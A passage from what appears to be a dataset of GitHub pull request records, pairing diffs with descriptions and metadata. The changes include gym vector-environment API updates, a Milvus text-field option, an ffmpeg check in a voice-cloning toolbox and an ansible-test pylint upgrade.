self._dones = np.zeros((self.num_envs,), dtype=np.bool_)
+ self._actions = None
def seed(self, seeds=None):
- """
- Parameters
- ----------
- seeds : list of int, or int, optional
- Random seed for each individual environment. If `seeds` is a list of
- length `num_envs`, then the items of the list are chosen as random
- seeds. If `seeds` is an int, then each environment uses the random
- seed `seeds + n`, where `n` is the index of the environment (between
- `0` and `num_envs - 1`).
- """
if seeds is None:
seeds = [None for _ in range(self.num_envs)]
if isinstance(seeds, int):
@@ -66,13 +57,7 @@ def seed(self, seeds=None):
for env, seed in zip(self.envs, seeds):
env.seed(seed)
- def reset(self):
- """
- Returns
- -------
- observations : sample from `observation_space`
- A batch of observations from the vectorized environment.
- """
+ def reset_wait(self):
self._dones[:] = False
observations = []
for env in self.envs:
@@ -82,29 +67,12 @@ def reset(self):
return np.copy(self.observations) if self.copy else self.observations
- def step(self, actions):
- """
- Parameters
- ----------
- actions : iterable of samples from `action_space`
- List of actions.
+ def step_async(self, actions):
+ self._actions = actions
- Returns
- -------
- observations : sample from `observation_space`
- A batch of observations from the vectorized environment.
-
- rewards : `np.ndarray` instance (dtype `np.float_`)
- A vector of rewards from the vectorized environment.
-
- dones : `np.ndarray` instance (dtype `np.bool_`)
- A vector whose entries indicate whether the episode has ended.
-
- infos : list of dict
- A list of auxiliary diagnostic informations.
- """
+ def step_wait(self):
observations, infos = [], []
- for i, (env, action) in enumerate(zip(self.envs, actions)):
+ for i, (env, action) in enumerate(zip(self.envs, self._actions)):
observation, self._rewards[i], self._dones[i], info = env.step(action)
if self._dones[i]:
observation = env.reset()
diff --git a/gym/vector/vector_env.py b/gym/vector/vector_env.py
index 06567641f7c..185b5e0d952 100644
--- a/gym/vector/vector_env.py
+++ b/gym/vector/vector_env.py
@@ -40,6 +40,12 @@ def reset_wait(self, **kwargs):
raise NotImplementedError()
def reset(self):
+ """
+ Returns
+ -------
+ observations : sample from `observation_space`
+ A batch of observations from the vectorized environment.
+ """
self.reset_async()
return self.reset_wait()
@@ -50,9 +56,43 @@ def step_wait(self, **kwargs):
raise NotImplementedError()
def step(self, actions):
+ """
+ Parameters
+ ----------
+ actions : iterable of samples from `action_space`
+ List of actions.
+
+ Returns
+ -------
+ observations : sample from `observation_space`
+ A batch of observations from the vectorized environment.
+
+ rewards : `np.ndarray` instance (dtype `np.float_`)
+ A vector of rewards from the vectorized environment.
+
+ dones : `np.ndarray` instance (dtype `np.bool_`)
+ A vector whose entries indicate whether the episode has ended.
+
+ infos : list of dict
+ A list of auxiliary diagnostic informations.
+ """
self.step_async(actions)
return self.step_wait()
+ def seed(self, seeds=None):
+ """
+ Parameters
+ ----------
+ seeds : list of int, or int, optional
+ Random seed for each individual environment. If `seeds` is a list of
+ length `num_envs`, then the items of the list are chosen as random
+ seeds. If `seeds` is an int, then each environment uses the random
+ seed `seeds + n`, where `n` is the index of the environment (between
+ `0` and `num_envs - 1`).
+ """
+ pass
+
+
def __del__(self):
if hasattr(self, 'closed'):
if not self.closed:
| AsyncVectorEnv updates: allow `daemon` flag to be on or off, allow custom workers (for messing with reset logic in a vecenv)
SyncVectorEnv - update API with `step_async` and `step_wait` methods for compatibility | https://api.github.com/repos/openai/gym/pulls/1706 | 2019-10-09T21:20:42Z | 2019-10-09T22:08:11Z | 2019-10-09T22:08:11Z | 2019-10-09T22:08:18Z | 1,909 | openai/gym | 5,926 |
Added Blockchain | diff --git a/README.md b/README.md
index 2de8f212da..30f7b88295 100644
--- a/README.md
+++ b/README.md
@@ -200,6 +200,7 @@ API | Description | Auth | HTTPS | Link |
API | Description | Auth | HTTPS | Link |
|---|---|---|---|---|
| Barchart OnDemand | Stock, Futures, and Forex Market Data | `apiKey` | Yes | [Go!](https://www.barchartondemand.com/free) |
+| Blockchain | Bitcoin Payment, Wallet & Transaction Data | No | Yes | [Go!](https://www.blockchain.info/api) |
| CoinDesk | Bitcoin Price Index | No | No | [Go!](http://www.coindesk.com/api/) |
| Consumer Financial Protection Bureau | Financial services Consumer Complaints Database | `apiKey` | Yes | [Go!](https://data.consumerfinance.gov/dataset/Consumer-Complaints/s6ew-h6mp) |
| IEX | Stocks and Market Data | No | Yes | [Go!](https://iextrading.com/developer/) |
| Thank you for taking the time to work on a Pull Request for this project!
To ensure your PR is dealt with swiftly please check the following:
- [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md).
- [x] Your changes are made in the [README](../README.md) file, not the auto-generated JSON.
- [x] Your additions are ordered alphabetically.
- [x] Your submission has a useful description.
- [x] Each table column should be padded with one space on either side.
- [x] You have searched the repository for any relevant issues or PRs.
- [x] Any category you are creating has the minimum requirement of 3 items.
| https://api.github.com/repos/public-apis/public-apis/pulls/478 | 2017-09-06T13:04:31Z | 2017-09-06T14:06:17Z | 2017-09-06T14:06:17Z | 2017-09-06T14:06:21Z | 250 | public-apis/public-apis | 35,178 |
Allowing custom text field name for Milvus (#7789) | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 67c4ca7941569..4e6daff48ba4e 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### New Features
- Added native support for `HuggingFaceEmbedding`, `InstructorEmbedding`, and `OptimumEmbedding` (#7795)
- Added metadata filtering and hybrid search to MyScale vector store (#7780)
+- Allowing custom text field name for Milvus (#7790)
- Add support for `vector_store_query_mode` to `VectorIndexAutoRetriever` (#7797)
### Bug Fixes / Nits
diff --git a/llama_index/vector_stores/milvus.py b/llama_index/vector_stores/milvus.py
index 69eb0e0011e15..528bdf7c8c4c7 100644
--- a/llama_index/vector_stores/milvus.py
+++ b/llama_index/vector_stores/milvus.py
@@ -6,9 +6,7 @@
import logging
from typing import Any, List, Optional
-from llama_index.schema import (
- BaseNode,
-)
+from llama_index.schema import BaseNode, TextNode
from llama_index.vector_stores.types import (
MetadataFilters,
VectorStore,
@@ -67,6 +65,8 @@ class MilvusVectorStore(VectorStore):
created collection. Defaults to "Session".
overwrite (bool, optional): Whether to overwrite existing collection with same
name. Defaults to False.
+ text_key (str, optional): What key text is stored in in the passed collection.
+ Used when bringing your own collection. Defaults to None.
Raises:
ImportError: Unable to import `pymilvus`.
@@ -91,6 +91,7 @@ def __init__(
similarity_metric: str = "IP",
consistency_level: str = "Strong",
overwrite: bool = False,
+ text_key: Optional[str] = None,
**kwargs: Any,
) -> None:
"""Init params."""
@@ -110,6 +111,7 @@ def __init__(
self.doc_id_field = doc_id_field
self.consistency_level = consistency_level
self.overwrite = overwrite
+ self.text_key = text_key
# Select the similarity metric
if similarity_metric.lower() in ("ip"):
@@ -270,9 +272,21 @@ def query(self, query: VectorStoreQuery, **kwargs: Any) -> VectorStoreQueryResul
# Parse the results
for hit in res[0]:
- node = metadata_dict_to_node(
- {"_node_content": hit["entity"].get("_node_content", None)}
- )
+ if not self.text_key:
+ node = metadata_dict_to_node(
+ {"_node_content": hit["entity"].get("_node_content", None)}
+ )
+ else:
+ try:
+ text = hit["entity"].get(self.text_key)
+ except Exception:
+ raise ValueError(
+ "The passed in text_key value does not exist "
+ "in the retrieved entity."
+ )
+ node = TextNode(
+ text=text,
+ )
nodes.append(node)
similarities.append(hit["distance"])
ids.append(hit["id"])
| # Description
Please include a summary of the change and which issue is fixed. Please also include relevant motivation and context. List any dependencies that are required for this change.
Fixes # 7789
## Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] Added new unit/integration tests
- [ ] Added new notebook (that tests end-to-end)
- [x] I stared at the code and made sure it makes sense
# Suggested Checklist:
- [x] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation
- [x] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [x] New and existing unit tests pass locally with my changes
| https://api.github.com/repos/run-llama/llama_index/pulls/7790 | 2023-09-22T19:25:52Z | 2023-09-24T21:21:38Z | 2023-09-24T21:21:38Z | 2023-09-25T16:21:21Z | 741 | run-llama/llama_index | 6,533 |
Added no_mp3_support argument and added a check for ffmpg installation | diff --git a/demo_cli.py b/demo_cli.py
index 7435552b7..1bd41b883 100644
--- a/demo_cli.py
+++ b/demo_cli.py
@@ -11,7 +11,7 @@
import argparse
import torch
import sys
-
+from audioread.exceptions import NoBackendError
if __name__ == '__main__':
## Info & args
@@ -34,12 +34,23 @@
"If True, audio won't be played.")
parser.add_argument("--seed", type=int, default=None, help=\
"Optional random number seed value to make toolbox deterministic.")
+ parser.add_argument("--no_mp3_support", action="store_true", help=\
+ "If True, disallows loading mp3 files to prevent audioread errors when ffmpeg is not installed.")
args = parser.parse_args()
print_args(args, parser)
if not args.no_sound:
import sounddevice as sd
+
+ if not args.no_mp3_support:
+ try:
+ librosa.load("samples/1320_00000.mp3")
+ except NoBackendError:
+ print("Librosa will be unable to open mp3 files if additional software is not installed.\n"
+ "Please install ffmpeg or add the '--no_mp3_support' option to proceed without support for mp3 files.")
+ exit(-1)
print("Running a test of your configuration...\n")
+
if torch.cuda.is_available():
device_id = torch.cuda.current_device()
gpu_properties = torch.cuda.get_device_properties(device_id)
@@ -123,8 +134,10 @@
message = "Reference voice: enter an audio filepath of a voice to be cloned (mp3, " \
"wav, m4a, flac, ...):\n"
in_fpath = Path(input(message).replace("\"", "").replace("\'", ""))
-
-
+
+ if in_fpath.suffix.lower() == ".mp3" and args.no_mp3_support:
+ print("Can't Use mp3 files please try again:")
+ continue
## Computing the embedding
# First, we load the wav using the function that the speaker encoder provides. This is
# important: there is preprocessing that must be applied.
diff --git a/demo_toolbox.py b/demo_toolbox.py
index f2a2e3b1a..9d310ee80 100644
--- a/demo_toolbox.py
+++ b/demo_toolbox.py
@@ -28,6 +28,8 @@
"overhead but allows to save some GPU memory for lower-end GPUs.")
parser.add_argument("--seed", type=int, default=None, help=\
"Optional random number seed value to make toolbox deterministic.")
+ parser.add_argument("--no_mp3_support", action="store_true", help=\
+ "If True, no mp3 files are allowed.")
args = parser.parse_args()
print_args(args, parser)
diff --git a/samples/1320_00000.mp3 b/samples/1320_00000.mp3
new file mode 100644
index 000000000..f0791b042
Binary files /dev/null and b/samples/1320_00000.mp3 differ
diff --git a/samples/3575_00000.mp3 b/samples/3575_00000.mp3
new file mode 100644
index 000000000..545d784f8
Binary files /dev/null and b/samples/3575_00000.mp3 differ
diff --git a/samples/6829_00000.mp3 b/samples/6829_00000.mp3
new file mode 100644
index 000000000..34f0382f1
Binary files /dev/null and b/samples/6829_00000.mp3 differ
diff --git a/samples/8230_00000.mp3 b/samples/8230_00000.mp3
new file mode 100644
index 000000000..b7c562009
Binary files /dev/null and b/samples/8230_00000.mp3 differ
diff --git a/samples/README.md b/samples/README.md
new file mode 100644
index 000000000..1a392d86e
--- /dev/null
+++ b/samples/README.md
@@ -0,0 +1,22 @@
+The audio files in this folder are provided for toolbox testing and
+benchmarking purposes. These are the same reference utterances
+used by the SV2TTS authors to generate the audio samples located at:
+https://google.github.io/tacotron/publications/speaker_adaptation/index.html
+
+The `p240_00000.mp3` and `p260_00000.mp3` files are compressed
+versions of audios from the VCTK corpus available at:
+https://datashare.is.ed.ac.uk/handle/10283/3443
+VCTK.txt contains the copyright notices and licensing information.
+
+The `1320_00000.mp3`, `3575_00000.mp3`, `6829_00000.mp3`
+and `8230_00000.mp3` files are compressed versions of audios
+from the LibriSpeech dataset available at: https://openslr.org/12
+For these files, the following notice applies:
+```
+LibriSpeech (c) 2014 by Vassil Panayotov
+
+LibriSpeech ASR corpus is licensed under a
+Creative Commons Attribution 4.0 International License.
+
+See <http://creativecommons.org/licenses/by/4.0/>.
+```
diff --git a/samples/VCTK.txt b/samples/VCTK.txt
new file mode 100644
index 000000000..b51455ac3
--- /dev/null
+++ b/samples/VCTK.txt
@@ -0,0 +1,94 @@
+---------------------------------------------------------------------
+ CSTR VCTK Corpus
+ English Multi-speaker Corpus for CSTR Voice Cloning Toolkit
+
+ (Version 0.92)
+ RELEASE September 2019
+ The Centre for Speech Technology Research
+ University of Edinburgh
+ Copyright (c) 2019
+
+ Junichi Yamagishi
+ jyamagis@inf.ed.ac.uk
+---------------------------------------------------------------------
+
+Overview
+
+This CSTR VCTK Corpus includes speech data uttered by 110 English
+speakers with various accents. Each speaker reads out about 400
+sentences, which were selected from a newspaper, the rainbow passage
+and an elicitation paragraph used for the speech accent archive.
+
+The newspaper texts were taken from Herald Glasgow, with permission
+from Herald & Times Group. Each speaker has a different set of the
+newspaper texts selected based a greedy algorithm that increases the
+contextual and phonetic coverage. The details of the text selection
+algorithms are described in the following paper:
+
+C. Veaux, J. Yamagishi and S. King,
+"The voice bank corpus: Design, collection and data analysis of
+a large regional accent speech database,"
+https://doi.org/10.1109/ICSDA.2013.6709856
+
+The rainbow passage and elicitation paragraph are the same for all
+speakers. The rainbow passage can be found at International Dialects
+of English Archive:
+(http://web.ku.edu/~idea/readings/rainbow.htm). The elicitation
+paragraph is identical to the one used for the speech accent archive
+(http://accent.gmu.edu). The details of the the speech accent archive
+can be found at
+http://www.ualberta.ca/~aacl2009/PDFs/WeinbergerKunath2009AACL.pdf
+
+All speech data was recorded using an identical recording setup: an
+omni-directional microphone (DPA 4035) and a small diaphragm condenser
+microphone with very wide bandwidth (Sennheiser MKH 800), 96kHz
+sampling frequency at 24 bits and in a hemi-anechoic chamber of
+the University of Edinburgh. (However, two speakers, p280 and p315
+had technical issues of the audio recordings using MKH 800).
+All recordings were converted into 16 bits, were downsampled to
+48 kHz, and were manually end-pointed.
+
+This corpus was originally aimed for HMM-based text-to-speech synthesis
+systems, especially for speaker-adaptive HMM-based speech synthesis
+that uses average voice models trained on multiple speakers and speaker
+adaptation technologies. This corpus is also suitable for DNN-based
+multi-speaker text-to-speech synthesis systems and waveform modeling.
+
+COPYING
+
+This corpus is licensed under the Creative Commons License: Attribution 4.0 International
+http://creativecommons.org/licenses/by/4.0/legalcode
+
+VCTK VARIANTS
+There are several variants of the VCTK corpus:
+Speech enhancement
+- Noisy speech database for training speech enhancement algorithms and TTS models where we added various types of noises to VCTK artificially: http://dx.doi.org/10.7488/ds/2117
+- Reverberant speech database for training speech dereverberation algorithms and TTS models where we added various types of reverberantion to VCTK artificially http://dx.doi.org/10.7488/ds/1425
+- Noisy reverberant speech database for training speech enhancement algorithms and TTS models http://dx.doi.org/10.7488/ds/2139
+- Device Recorded VCTK where speech signals of the VCTK corpus were played back and re-recorded in office environments using relatively inexpensive consumer devices http://dx.doi.org/10.7488/ds/2316
+- The Microsoft Scalable Noisy Speech Dataset (MS-SNSD) https://github.com/microsoft/MS-SNSD
+
+ASV and anti-spoofing
+- Spoofing and Anti-Spoofing (SAS) corpus, which is a collection of synthetic speech signals produced by nine techniques, two of which are speech synthesis, and seven are voice conversion. All of them were built using the VCTK corpus. http://dx.doi.org/10.7488/ds/252
+- Automatic Speaker Verification Spoofing and Countermeasures Challenge (ASVspoof 2015) Database. This database consists of synthetic speech signals produced by ten techniques and this has been used in the first Automatic Speaker Verification Spoofing and Countermeasures Challenge (ASVspoof 2015) http://dx.doi.org/10.7488/ds/298
+- ASVspoof 2019: The 3rd Automatic Speaker Verification Spoofing and Countermeasures Challenge database. This database has been used in the 3rd Automatic Speaker Verification Spoofing and Countermeasures Challenge (ASVspoof 2019) https://doi.org/10.7488/ds/2555
+
+
+ACKNOWLEDGEMENTS
+
+The CSTR VCTK Corpus was constructed by:
+
+ Christophe Veaux (University of Edinburgh)
+ Junichi Yamagishi (University of Edinburgh)
+ Kirsten MacDonald
+
+The research leading to these results was partly funded from EPSRC
+grants EP/I031022/1 (NST) and EP/J002526/1 (CAF), from the RSE-NSFC
+grant (61111130120), and from the JST CREST (uDialogue).
+
+Please cite this corpus as follows:
+Christophe Veaux, Junichi Yamagishi, Kirsten MacDonald,
+"CSTR VCTK Corpus: English Multi-speaker Corpus for CSTR Voice Cloning Toolkit",
+The Centre for Speech Technology Research (CSTR),
+University of Edinburgh
+
diff --git a/samples/p240_00000.mp3 b/samples/p240_00000.mp3
new file mode 100644
index 000000000..4787405c2
Binary files /dev/null and b/samples/p240_00000.mp3 differ
diff --git a/samples/p260_00000.mp3 b/samples/p260_00000.mp3
new file mode 100644
index 000000000..ff5f5032e
Binary files /dev/null and b/samples/p260_00000.mp3 differ
diff --git a/toolbox/__init__.py b/toolbox/__init__.py
index bdef19e1e..018e5af1e 100644
--- a/toolbox/__init__.py
+++ b/toolbox/__init__.py
@@ -9,7 +9,8 @@
import traceback
import sys
import torch
-
+import librosa
+from audioread.exceptions import NoBackendError
# Use this directory structure for your datasets, or modify it to fit your needs
recognized_datasets = [
@@ -39,7 +40,15 @@
MAX_WAVES = 15
class Toolbox:
- def __init__(self, datasets_root, enc_models_dir, syn_models_dir, voc_models_dir, low_mem, seed):
+ def __init__(self, datasets_root, enc_models_dir, syn_models_dir, voc_models_dir, low_mem, seed, no_mp3_support):
+ if not no_mp3_support:
+ try:
+ librosa.load("samples/6829_00000.mp3")
+ except NoBackendError:
+ print("Librosa will be unable to open mp3 files if additional software is not installed.\n"
+ "Please install ffmpeg or add the '--no_mp3_support' option to proceed without support for mp3 files.")
+ exit(-1)
+ self.no_mp3_support = no_mp3_support
sys.excepthook = self.excepthook
self.datasets_root = datasets_root
self.low_mem = low_mem
@@ -64,7 +73,7 @@ def __init__(self, datasets_root, enc_models_dir, syn_models_dir, voc_models_dir
self.reset_ui(enc_models_dir, syn_models_dir, voc_models_dir, seed)
self.setup_events()
self.ui.start()
-
+
def excepthook(self, exc_type, exc_value, exc_tb):
traceback.print_exception(exc_type, exc_value, exc_tb)
self.ui.log("Exception: %s" % exc_value)
@@ -149,7 +158,11 @@ def load_from_browser(self, fpath=None):
else:
name = fpath.name
speaker_name = fpath.parent.name
-
+
+ if fpath.suffix.lower() == ".mp3" and self.no_mp3_support:
+ self.ui.log("Error: No mp3 file argument was passed but an mp3 file was used")
+ return
+
# Get the wav from the disk. We take the wav with the vocoder/synthesizer format for
# playback, so as to have a fair comparison with the generated audio
wav = Synthesizer.load_preprocess_wav(fpath)
| This is a fix for this [issue](https://github.com/CorentinJ/Real-Time-Voice-Cloning/issues/446) Please let me know if anything else needs to get done | https://api.github.com/repos/CorentinJ/Real-Time-Voice-Cloning/pulls/517 | 2020-09-01T23:11:59Z | 2020-09-03T22:31:52Z | 2020-09-03T22:31:52Z | 2020-09-03T22:31:52Z | 3,299 | CorentinJ/Real-Time-Voice-Cloning | 27,391 |
隐藏在mac上启动时的终端 | diff --git a/start.sh b/start.sh
index 85a6a3705b..84cfb607be 100755
--- a/start.sh
+++ b/start.sh
@@ -3,8 +3,30 @@
SCRIPTPATH="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd $SCRIPTPATH
-if hash python2 2>/dev/null; then
- python2 launcher/start.py
+# launch xx-net service by ignore hungup signal
+function launchWithNoHungup() {
+ if hash python2 2>/dev/null; then
+ nohup python2 launcher/start.py 2&> /dev/null &
+ else
+ nohup python launcher/start.py 2&> /dev/null &
+ fi
+}
+
+# launch xx-net service by hungup signal
+function launchWithHungup() {
+ if hash python2 2>/dev/null; then
+ python2 launcher/start.py
+ else
+ python launcher/start.py
+ fi
+}
+
+# get operating system name
+os_name=`uname -s`
+
+# Darwin for os x
+if [ $os_name = 'Darwin' ];then
+ launchWithNoHungup
else
- python launcher/start.py
-fi
+ launchWithHungup
+fi
\ No newline at end of file
| Improve #2761 when launch XX-Net without Terminal
| https://api.github.com/repos/XX-net/XX-Net/pulls/2769 | 2016-04-07T09:28:46Z | 2016-04-09T10:01:22Z | 2016-04-09T10:01:21Z | 2016-04-09T10:01:22Z | 294 | XX-net/XX-Net | 17,102 |
[workflow] fixed communtity report ranking | diff --git a/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py b/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py
index 36cdd9518486..16b8957c1d88 100644
--- a/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py
+++ b/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py
@@ -292,7 +292,13 @@ def generate_user_engagement_leaderboard_image(github_token: str, output_path: s
y = []
if len(total_engagement_count) > 0:
+ ranking = []
for name, count in total_engagement_count.items():
+ ranking.append((name, count))
+
+ ranking.sort(key=lambda x: x[1], reverse=True)
+
+ for name, count in ranking:
x.append(count)
y.append(name)
| ## 📌 Checklist before creating the PR
- [x] I have created an issue for this PR for traceability
- [x] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [x] I have added relevant tags if possible for us to better distinguish different PRs
## 🚨 Issue number
> Link this PR to your issue with words like fixed to automatically close the linked issue upon merge
>
> e.g. `fixed #1234`, `closed #1234`, `resolved #1234`
## 📝 What does this PR do?
> Summarize your work here.
> if you have any plots/diagrams/screenshots/tables, please attach them here.
This PR fixed the user engagement ranking as the previous code did not sort the list.
## 💥 Checklist before requesting a review
- [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests.
- [ ] I have added docstrings for all the functions/methods I implemented
## ⭐️ Do you enjoy contributing to Colossal-AI?
- [x] 🌝 Yes, I do.
- [ ] 🌚 No, I don't.
Tell us more if you don't enjoy contributing to Colossal-AI.
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/2680 | 2023-02-13T09:04:41Z | 2023-02-13T09:04:49Z | 2023-02-13T09:04:49Z | 2023-02-13T09:05:09Z | 203 | hpcaitech/ColossalAI | 11,816 |
fix dailymotion for #609 | diff --git a/src/you_get/extractors/dailymotion.py b/src/you_get/extractors/dailymotion.py
index 8e8851aa3e..988920bb8a 100644
--- a/src/you_get/extractors/dailymotion.py
+++ b/src/you_get/extractors/dailymotion.py
@@ -8,16 +8,12 @@ def dailymotion_download(url, output_dir = '.', merge = True, info_only = False)
"""Downloads Dailymotion videos by URL.
"""
- id = match1(url, r'/video/([^\?]+)') or match1(url, r'video=([^\?]+)')
- embed_url = 'http://www.dailymotion.com/embed/video/%s' % id
- html = get_content(embed_url)
+ html = get_content(url)
+ info = json.loads(match1(html, r'qualities":({.+?}),"'))
+ title = match1(html, r'"title"\s*:\s*"(.+?)",')
- info = json.loads(match1(html, r'var\s*info\s*=\s*({.+}),\n'))
-
- title = info['title']
-
- for quality in ['stream_h264_hd1080_url', 'stream_h264_hd_url', 'stream_h264_hq_url', 'stream_h264_url', 'stream_h264_ld_url']:
- real_url = info[quality]
+ for quality in ['720','480','380','240','auto']:
+ real_url = info[quality][0]["url"]
if real_url:
break
| <!-- Reviewable:start -->
[<img src="https://reviewable.io/review_button.png" height=40 alt="Review on Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/614)
<!-- Reviewable:end -->
| https://api.github.com/repos/soimort/you-get/pulls/614 | 2015-08-28T16:27:46Z | 2015-08-28T16:31:19Z | 2015-08-28T16:31:19Z | 2015-08-28T16:31:19Z | 364 | soimort/you-get | 21,004 |
ansible-test - Update pylint to 2.16.0 | diff --git a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py
index f1be4f3432cb2c..d05a4ba72027c2 100644
--- a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py
+++ b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py
@@ -15,9 +15,4 @@
# 'Call' object has no attribute 'value'
result = {None: None}[{}.get('something')]
-# pylint 2.3.1 and 2.4.4 report the following error but 2.5.0 and 2.6.0 do not
-# blacklisted-name: Black listed name "foo"
-# see: https://github.com/PyCQA/pylint/issues/3701
-# regression: documented as a known issue and removed from ignore.txt so pylint can be upgraded to 2.6.0
-# if future versions of pylint fix this issue then the ignore should be restored
foo = {}.keys()
diff --git a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt
index e1b3f4ca09dba7..dcbe827ca56de4 100644
--- a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt
+++ b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/sanity/ignore.txt
@@ -1,6 +1,7 @@
plugins/modules/bad.py import
plugins/modules/bad.py pylint:ansible-bad-module-import
plugins/lookup/bad.py import
+plugins/plugin_utils/check_pylint.py pylint:disallowed-name
tests/integration/targets/hello/files/bad.py pylint:ansible-bad-function
tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import
tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import-from
diff --git a/test/integration/targets/module_utils/library/test.py b/test/integration/targets/module_utils/library/test.py
index fb6c8a81c35c10..c8a5976cafb649 100644
--- a/test/integration/targets/module_utils/library/test.py
+++ b/test/integration/targets/module_utils/library/test.py
@@ -72,12 +72,12 @@
results['spam8'] = (bacon.data, eggs)
# Test that import of module_utils/qux1/quux.py using as works
-from ansible.module_utils.qux1 import quux as one
-results['qux1'] = one.data
+from ansible.module_utils.qux1 import quux as two
+results['qux1'] = two.data
# Test that importing qux2/quux.py and qux2/quuz.py using as works
-from ansible.module_utils.qux2 import quux as one, quuz as two
-results['qux2'] = (one.data, two.data)
+from ansible.module_utils.qux2 import quux as three, quuz as four
+results['qux2'] = (three.data, four.data)
# Test depth
from ansible.module_utils.a.b.c.d.e.f.g.h import data
diff --git a/test/lib/ansible_test/_data/requirements/sanity.pylint.in b/test/lib/ansible_test/_data/requirements/sanity.pylint.in
index ca9806651544b8..70010f95dad17f 100644
--- a/test/lib/ansible_test/_data/requirements/sanity.pylint.in
+++ b/test/lib/ansible_test/_data/requirements/sanity.pylint.in
@@ -1,2 +1,2 @@
-pylint == 2.15.10 # currently vetted version
+pylint == 2.16.0 # currently vetted version
pyyaml # needed for collection_detail.py
diff --git a/test/lib/ansible_test/_data/requirements/sanity.pylint.txt b/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
index b13ad7675ff564..76aa07c17e9961 100644
--- a/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
+++ b/test/lib/ansible_test/_data/requirements/sanity.pylint.txt
@@ -1,11 +1,11 @@
# edit "sanity.pylint.in" and generate with: hacking/update-sanity-requirements.py --test pylint
-astroid==2.13.3
+astroid==2.14.1
dill==0.3.6
-isort==5.11.4
+isort==5.12.0
lazy-object-proxy==1.9.0
mccabe==0.7.0
platformdirs==2.6.2
-pylint==2.15.10
+pylint==2.16.0
PyYAML==6.0
tomli==2.0.1
tomlkit==0.11.6
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg
index aa347729591d45..e35301dd81c1bd 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test-target.cfg
@@ -10,6 +10,7 @@ disable=
raise-missing-from, # Python 2.x does not support raise from
super-with-arguments, # Python 2.x does not support super without arguments
redundant-u-string-prefix, # Python 2.x support still required
+ broad-exception-raised, # many exceptions with no need for a custom type
too-few-public-methods,
too-many-arguments,
too-many-branches,
@@ -19,6 +20,7 @@ disable=
too-many-nested-blocks,
too-many-return-statements,
too-many-statements,
+ use-dict-literal, # ignoring as a common style issue
useless-return, # complains about returning None when the return type is optional
[BASIC]
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg
index 1c03472c7b1bd8..bf7872d97a538f 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/ansible-test.cfg
@@ -8,6 +8,7 @@ disable=
duplicate-code, # consistent results require running with --jobs 1 and testing all files
import-outside-toplevel, # common pattern in ansible related code
raise-missing-from, # Python 2.x does not support raise from
+ broad-exception-raised, # many exceptions with no need for a custom type
too-few-public-methods,
too-many-public-methods,
too-many-arguments,
@@ -18,6 +19,7 @@ disable=
too-many-nested-blocks,
too-many-return-statements,
too-many-statements,
+ use-dict-literal, # ignoring as a common style issue
unspecified-encoding, # always run with UTF-8 encoding enforced
useless-return, # complains about returning None when the return type is optional
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg
index e3aa8eedcc8653..c30eb37a749850 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/code-smell.cfg
@@ -17,6 +17,7 @@ disable=
too-many-nested-blocks,
too-many-return-statements,
too-many-statements,
+ use-dict-literal, # ignoring as a common style issue
unspecified-encoding, # always run with UTF-8 encoding enforced
useless-return, # complains about returning None when the return type is optional
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg
index 38b8d2d0152fee..78064542f9038f 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/collection.cfg
@@ -9,7 +9,8 @@ disable=
